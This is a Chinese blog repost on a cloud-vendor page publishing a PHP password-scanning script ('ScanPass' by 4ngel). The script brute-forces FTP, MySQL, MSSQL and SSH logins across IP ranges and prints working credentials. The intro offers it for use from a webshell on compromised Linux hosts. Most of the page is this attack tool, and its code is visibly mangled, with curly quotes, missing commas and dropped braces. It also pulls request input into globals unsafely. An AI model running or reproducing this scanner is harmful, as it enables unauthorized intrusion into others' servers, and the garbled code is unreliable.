PHP扫FTP\MYSQL\MSSQL\SSH密码的脚本

本文涉及的产品
云数据库 RDS MySQL,集群系列 2核4GB
推荐场景:
搭建个人博客
RDS MySQL Serverless 基础系列,0.5-2RCU 50GB
云数据库 RDS PostgreSQL,集群系列 2核4GB
简介:

可以扫FTPMYSQLMSSQLSSH密码

比如webshell在linux下。不会在LINUX下渗透。可以试试这个。

 

 
  1. <?php 
  2. @set_magic_quotes_runtime(0); 
  3. @set_time_limit(0); 
  4.  
  5. // 允许程序在 register_globals = off 的环境下工作 
  6. $onoff = function_exists(‘ini_get’) ? ini_get(‘register_globals’) : get_cfg_var(‘register_globals’); 
  7. if ($onoff != 1) { 
  8. @extract($_POST, EXTR_SKIP); 
  9. @extract($_GET, EXTR_SKIP); 
  10. function pr($a) { 
  11. echo ‘<pre>’; 
  12. print_r($a); 
  13. echo ‘</pre>’; 
  14.  
  15. session_start(); 
  16.  
  17. $type = in_array($_POST['type'], array(‘ftp’,'mysql’,'mssql’,'ssh’)) ? $_POST['type'] : ”; 
  18.  
  19. $_SESSION['type'] = $type
  20. $_SESSION['ftpport'] = $ftpport = $_POST['ftpport']; 
  21. $_SESSION['mysqlport'] = $mysqlport = $_POST['mysqlport']; 
  22. $_SESSION['mssqlport'] = $mssqlport = $_POST['mssqlport']; 
  23. $_SESSION['sshport'] = $mssqlport = $_POST['sshport']; 
  24. $_SESSION['hostlist'] = $hostlist = $_POST['hostlist']; 
  25. $_SESSION['userlist'] = $userlist = $_POST['userlist']; 
  26. $_SESSION['passlist'] = $passlist = $_POST['passlist']; 
  27.  
  28. ?> 
  29. <!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd“> 
  30. <html xmlns=”http://www.w3.org/1999/xhtml“> 
  31. <head> 
  32. <meta http-equiv=”Content-Type” content=”text/html; charset=gbk” /> 
  33. <title>ScanPass(FTP/MYSQL/MSSQL/SSH) by 4ngel</title> 
  34. <style type=”text/css”> 
  35. body, div, td {font-size: 12px;font-family: Arial, sans-serif;color: #333;line-height: 16px;} 
  36. a{color:#833;text-decoration:none;} 
  37. a:hover{color:#147;text-decoration:underline;} 
  38. </style><!–{if $returnurl}–> 
  39. </head> 
  40.  
  41. <body> 
  42. <?php 
  43. if ($type && $hostlist && $userlist && isset($passlist)) { 
  44. $hostdb = explode(“n”, $hostlist); 
  45. $userdb = explode(“n”, $userlist); 
  46. $passdb = explode(“n”, $passlist); 
  47. echo ‘<p>’.$type.’ result</p><hr>’; 
  48. if ($type == ‘mysql’) { 
  49. !$mysqlport && $mysqlport = 3306; 
  50. foreach($hostdb as $host){ 
  51. $i=0; 
  52. if (strpos($host, ‘-’)) { 
  53. $host1 = explode(‘-’, $host); 
  54. $hoststart = explode(‘.’, $host1[0]); 
  55. $hostend = explode(‘.’, $host1[1]); 
  56.  
  57. for($i=$hoststart[3];$i<$hostend[3];$i++) { 
  58. foreach($userdb as $user) { 
  59. if ($user) { 
  60. foreach($passdb as $pass) { 
  61. !$pass && $pass=”; 
  62. $h = $hoststart[0].’.’.$hoststart[1].’.’.$hoststart[2].’.’.$i
  63. if($link = @mysql_connect($h.’:’.$mysqlport$user$pass)) { 
  64. echo $h.’:’.$mysqlport.’ / <span style=”color:#00f;”>’.$user.’</span> / <span style=”color:#f00;”>’.($pass ? $pass : ‘NULL’).’</span><br />’; 
  65. @mysql_close($link); 
  66. break
  67. continue
  68. else { 
  69. foreach($userdb as $user) { 
  70. if ($user) { 
  71. foreach($passdb as $pass) { 
  72. !$pass && $pass=”; 
  73. if($link = mysql_connect($host.’:’.$mysqlport$user$pass)) { 
  74. echo $host.’:’.$mysqlport.’ / <span style=”color:#00f;”>’.$user.’</span> / <span style=”color:#f00;”>’.($pass ? $pass : ‘NULL’).’</span><br />’; 
  75. @mysql_close($link); 
  76. break
  77. elseif ($type == ‘ftp’) { 
  78. !$ftpport && $ftpport = 21; 
  79.  
  80. foreach($hostdb as $host){ 
  81. $i=0; 
  82. if (strpos($host, ‘-’)) { 
  83. $host1 = explode(‘-’, $host); 
  84. $hoststart = explode(‘.’, $host1[0]); 
  85. $hostend = explode(‘.’, $host1[1]); 
  86.  
  87. for($i=$hoststart[3];$i<$hostend[3];$i++) { 
  88. foreach($userdb as $user) { 
  89. if ($user) { 
  90. foreach($passdb as $pass) { 
  91. !$pass && $pass=”; 
  92. $h = $hoststart[0].’.’.$hoststart[1].’.’.$hoststart[2].’.’.$i
  93. if ($conn_id = @ftp_connect($h$ftpport)) { 
  94. if (@ftp_login($conn_id$user$pass)) { 
  95. echo $h.’:’.$ftpport.’ / <span style=”color:#00f;”>’.$user.’</span> / <span style=”color:#f00;”>’.($pass ? $pass : ‘NULL’).’</span><br />’; 
  96. @ftp_close($conn_id); 
  97. break
  98. continue
  99. else { 
  100. foreach($userdb as $user) { 
  101. if ($user) { 
  102. foreach($passdb as $pass) { 
  103. !$pass && $pass=”; 
  104. if ($conn_id = @ftp_connect($host$ftpport)) { 
  105. if (@ftp_login($conn_id$user$pass)) { 
  106. echo $host.’:’.$ftpport.’ / <span style=”color:#00f;”>’.$user.’</span> / <span style=”color:#f00;”>’.($pass ? $pass : ‘NULL’).’</span><br />’; 
  107. @ftp_close($conn_id); 
  108. break
  109. elseif ($type == ‘mssql’) { 
  110. @ini_set(‘mssql.charset’, ‘UTF-8′); 
  111. @ini_set(‘mssql.textlimit’, 2147483647); 
  112. @ini_set(‘mssql.textsize’, 2147483647); 
  113. if (extension_loaded(‘mssql’)) { 
  114. foreach($hostdb as $host){ 
  115. $i=0; 
  116. if (strpos($host, ‘-’)) { 
  117. $host1 = explode(‘-’, $host); 
  118. $hoststart = explode(‘.’, $host1[0]); 
  119. $hostend = explode(‘.’, $host1[1]); 
  120.  
  121. for($i=$hoststart[3];$i<$hostend[3];$i++) { 
  122. foreach($userdb as $user) { 
  123. if ($user) { 
  124. foreach($passdb as $pass) { 
  125. !$pass && $pass=”; 
  126. $h = $hoststart[0].’.’.$hoststart[1].’.’.$hoststart[2].’.’.$i
  127. if($link = @mssql_connect($h$user$pass, false)) { 
  128. echo $h.’:’.$mssqlport.’ / <span style=”color:#00f;”>’.$user.’</span> / <span style=”color:#f00;”>’.($pass ? $pass : ‘NULL’).’</span><br />’; 
  129. @mssql_close($link); 
  130. break
  131. continue
  132. else { 
  133. foreach($userdb as $user) { 
  134. if ($user) { 
  135. foreach($passdb as $pass) { 
  136. !$pass && $pass=”; 
  137. if($link = @mssql_connect($host$user$pass, false)) { 
  138. echo $host.’:’.$mssqlport.’ / <span style=”color:#00f;”>’.$user.’</span> / <span style=”color:#f00;”>’.($pass ? $pass : ‘NULL’).’</span><br />’; 
  139. @mssql_close($link); 
  140. break
  141. else { 
  142. echo ‘mssql extension is disable.’; 
  143. else { 
  144. if (function_exists(‘ssh2_connect’) && function_exists(‘ssh2_auth_password’)) { 
  145. !$sshport && $sshport = 22; 
  146.  
  147. foreach($hostdb as $host){ 
  148. $i=0; 
  149. if (strpos($host, ‘-’)) { 
  150. $host1 = explode(‘-’, $host); 
  151. $hoststart = explode(‘.’, $host1[0]); 
  152. $hostend = explode(‘.’, $host1[1]); 
  153.  
  154. for($i=$hoststart[3];$i<$hostend[3];$i++) { 
  155. foreach($userdb as $user) { 
  156. if ($user) { 
  157. foreach($passdb as $pass) { 
  158. !$pass && $pass=”; 
  159. $h = $hoststart[0].’.’.$hoststart[1].’.’.$hoststart[2].’.’.$i
  160. if ($conn_id = @ssh2_connect($h$sshport)) { 
  161. if (@ssh2_auth_password($conn_id$user$pass)) { 
  162. echo $h.’:’.$sshport.’ / <span style=”color:#00f;”>’.$user.’</span> / <span style=”color:#f00;”>’.($pass ? $pass : ‘NULL’).’</span><br />’; 
  163. break
  164. continue
  165. else { 
  166. foreach($userdb as $user) { 
  167. if ($user) { 
  168. foreach($passdb as $pass) { 
  169. !$pass && $pass=”; 
  170. if ($conn_id = @ssh2_connect($host$sshport)) { 
  171. if (@ssh2_auth_password($conn_id$user$pass)) { 
  172. echo $host.’:’.$sshport.’ / <span style=”color:#00f;”>’.$user.’</span> / <span style=”color:#f00;”>’.($pass ? $pass : ‘NULL’).’</span><br />’; 
  173. break
  174. else { 
  175. echo “function ssh2_connect doesn’t exist”; 
  176. echo ‘<p>Over…</p><hr>’; 
  177. ?> 
  178. <form id=”form1″ name=”form1″ method=”post” action=”"> 
  179. <table border=”0″ cellpadding=”0″ cellspacing=”5″> 
  180. <tr> 
  181. <td valign=”top”>项目</td> 
  182. <td><input type=”radio” name=”type” id=”ftp” value=”ftp” <?php if ($_SESSION['type'] == ‘ftp’) {echo ‘checked’;}?> /> 
  183. FTP 端口<input type=”text” size=”5″ name=”ftpport” id=”ftpport” value=”<?php if ($_SESSION['ftpport']) {echo $_SESSION['ftpport'];} else {echo ’21′;}?>” /><br /> 
  184. <input type=”radio” name=”type” id=”mysql” value=”mysql” <?php if ($_SESSION['type'] == ‘mysql’ || !$type) {echo ‘checked’;}?> /> 
  185. MYSQL 端口<input type=”text” size=”5″ name=”mysqlport” id=”mysqlport” value=”<?php if ($_SESSION['mysqlport']) {echo $_SESSION['mysqlport'];} else {echo ’3306′;}?>” /><br /> 
  186. <input type=”radio” name=”type” id=”mssql” value=”mssql” <?php if ($_SESSION['type'] == ‘mssql’) {echo ‘checked’;}?> /> 
  187. MSSQL 端口<input type=”text” size=”5″ name=”mssqlport” id=”mssqlport” value=”<?php if ($_SESSION['mssqlport']) {echo $_SESSION['mssqlport'];} else {echo ’1433′;}?>” /><br /> 
  188. <input type=”radio” name=”type” id=”ssh” value=”ssh” <?php if ($_SESSION['type'] == ‘ssh’) {echo ‘checked’;}?> /> 
  189. SSH 端口<input type=”text” size=”5″ name=”sshport” id=”sshport” value=”<?php if ($_SESSION['sshport']) {echo $_SESSION['sshport'];} else {echo ’22′;}?>” /></td> 
  190. </tr> 
  191. <tr> 
  192. <td valign=”top”>主机列表</td> 
  193. <td><textarea name=”hostlist” id=”hostlist” cols=”45″ rows=”5″><?php echo $_SESSION['hostlist'];?></textarea> 
  194. <br /> 
  195. 192.168.1.1-192.168.1.254<br /> 
  196. 或一行一个或一行一个段</td> 
  197. </tr> 
  198. <tr> 
  199. <td valign=”top”>用户名列表</td> 
  200. <td><textarea name=”userlist” id=”userlist” cols=”45″ rows=”5″><?php echo $_SESSION['userlist'];?></textarea> 
  201. <br /> 
  202. 一行一个</td> 
  203. </tr> 
  204. <tr> 
  205. <td valign=”top”>密码列表</td> 
  206. <td><textarea name=”passlist” id=”passlist” cols=”45″ rows=”5″><?php echo $_SESSION['passlist'];?></textarea> 
  207. <br /> 
  208. 一行一个</td> 
  209. </tr> 
  210. <tr> 
  211. <td>&nbsp;</td> 
  212. <td><input type=”submit” value=”提交” /></td> 
  213. </tr> 
  214. </table> 
  215. </form> 
  216. <hr /> 
  217. Codz by <a href=”http://www.sablog.net/blog”>4ngel</a><br /> 
  218. 2010-11-30 
  219. </body> 
  220. </html> 

 













本文转hackfreer51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/441308,如需转载请自行联系原作者

相关实践学习
如何在云端创建MySQL数据库
开始实验后,系统会自动创建一台自建MySQL的 源数据库 ECS 实例和一台 目标数据库 RDS。
全面了解阿里云能为你做什么
阿里云在全球各地部署高效节能的绿色数据中心,利用清洁计算为万物互联的新世界提供源源不断的能源动力,目前开服的区域包括中国(华北、华东、华南、香港)、新加坡、美国(美东、美西)、欧洲、中东、澳大利亚、日本。目前阿里云的产品涵盖弹性计算、数据库、存储与CDN、分析与搜索、云通信、网络、管理与监控、应用服务、互联网中间件、移动服务、视频服务等。通过本课程,来了解阿里云能够为你的业务带来哪些帮助 &nbsp; &nbsp; 相关的阿里云产品:云服务器ECS 云服务器 ECS(Elastic Compute Service)是一种弹性可伸缩的计算服务,助您降低 IT 成本,提升运维效率,使您更专注于核心业务创新。产品详情: https://www.aliyun.com/product/ecs
相关文章
|
19天前
|
安全 关系型数据库 MySQL
PHP与MySQL交互:从入门到实践
【9月更文挑战第20天】在数字时代的浪潮中,掌握PHP与MySQL的互动成为了开发动态网站和应用程序的关键。本文将通过简明的语言和实例,引导你理解PHP如何与MySQL数据库进行对话,开启你的编程之旅。我们将从连接数据库开始,逐步深入到执行查询、处理结果,以及应对常见的挑战。无论你是初学者还是希望提升技能的开发者,这篇文章都将为你提供实用的知识和技巧。让我们一起探索PHP与MySQL交互的世界,解锁数据的力量!
|
1月前
|
NoSQL 关系型数据库 MySQL
不是 PHP 不行了,而是 MySQL 数据库扛不住啊
【9月更文挑战第8天】这段内容讨论了MySQL在某些场景下面临的挑战及其原因,并指出这些问题不能完全归咎于MySQL本身。高并发读写压力、数据量增长以及复杂查询和事务处理都可能导致性能瓶颈。然而,应用程序设计不合理、系统架构不佳以及其他数据库选择和优化策略不足也是重要因素。综合考虑这些方面才能有效解决性能问题,而MySQL通过不断改进和优化,仍然是许多应用场景中的可靠选择。
|
2月前
|
存储 SQL 关系型数据库
PHP与MySQL交互的奥秘
【8月更文挑战第29天】在编程的世界里,PHP和MySQL就像是一对默契的舞伴,共同演绎着数据的交响曲。本文将带你探索它们之间的互动,从连接数据库到执行查询,再到处理结果,每一步都充满了节奏与和谐。我们将一起走进这段代码的旅程,感受数据流动的魅力。
|
2月前
|
网络安全
mac下通过ssh脚本实现免账号密码连接运服务器
mac下通过ssh脚本实现免账号密码连接运服务器
39 3
|
2月前
|
安全 Shell 网络安全
告别繁琐密码,一键解锁GitHub高效秘籍!SSH配置大揭秘,让你的代码托管之旅飞起来!
【8月更文挑战第4天】在使用GitHub时,频繁输入账号密码颇为不便。采用SSH协议可提升安全性并简化流程。本文以问答形式指导你快速配置GitHub SSH:了解SSH优势、学会生成与添加SSH密钥及测试连接。通过简单的步骤,即可实现无缝代码推送与拉取,享受高效、安全的开发体验。记得保护好私钥并根据需要设置多个密钥对。
48 7
|
2月前
|
SQL 关系型数据库 MySQL
PHP与MySQL交互之基础教程
【8月更文挑战第31天】 在数字世界中,数据是推动一切的核心力量。本文将引导你探索PHP与MySQL的协同工作,通过实际代码示例,展示如何建立连接、执行查询以及处理结果集。无论你是初学者还是希望巩固知识的开发者,这篇文章都将为你提供宝贵的实践知识。
|
2月前
|
安全 Linux Shell
Linux系统之间实现免密码登录(SSH无密码登录
【8月更文挑战第21天】要在Linux系统间实现SSH免密码登录,需先在源机器生成SSH密钥对,然后将公钥复制到目标机器的`.ssh/authorized_keys`文件中。可通过`ssh-keygen`命令生成密钥,并使用`ssh-copy-id`命令传输公钥。最后测试SSH连接,确保能无密码登录。若目标机器缺少相关目录或文件,需手动创建并设置适当权限。完成这些步骤后,即可实现安全便捷的免密码登录。
60 0
|
3月前
|
数据库
基于PHP+MYSQL开发制作的趣味测试网站源码
基于PHP+MYSQL开发制作的趣味测试网站源码。可在后台提前设置好缘分, 自己手动在数据库里修改数据,数据库里有就会优先查询数据库的信息, 没设置的话第一次查询缘分都是非常好的 95-99,第二次查就比较差 , 所以如果要你女朋友查询你的名字觉得很好 那就得是她第一反应是查和你的缘分, 如果查的是别人,那不好意思,第二个可能是你。
54 3
|
3月前
|
Shell 网络安全
shell脚本 配饰ssh
【7月更文挑战第15天】
32 4
|
4月前
|
安全 Linux Shell
SSH服务器拒绝密码登录的解决方法
SSH服务器拒绝密码登录的解决方法
810 1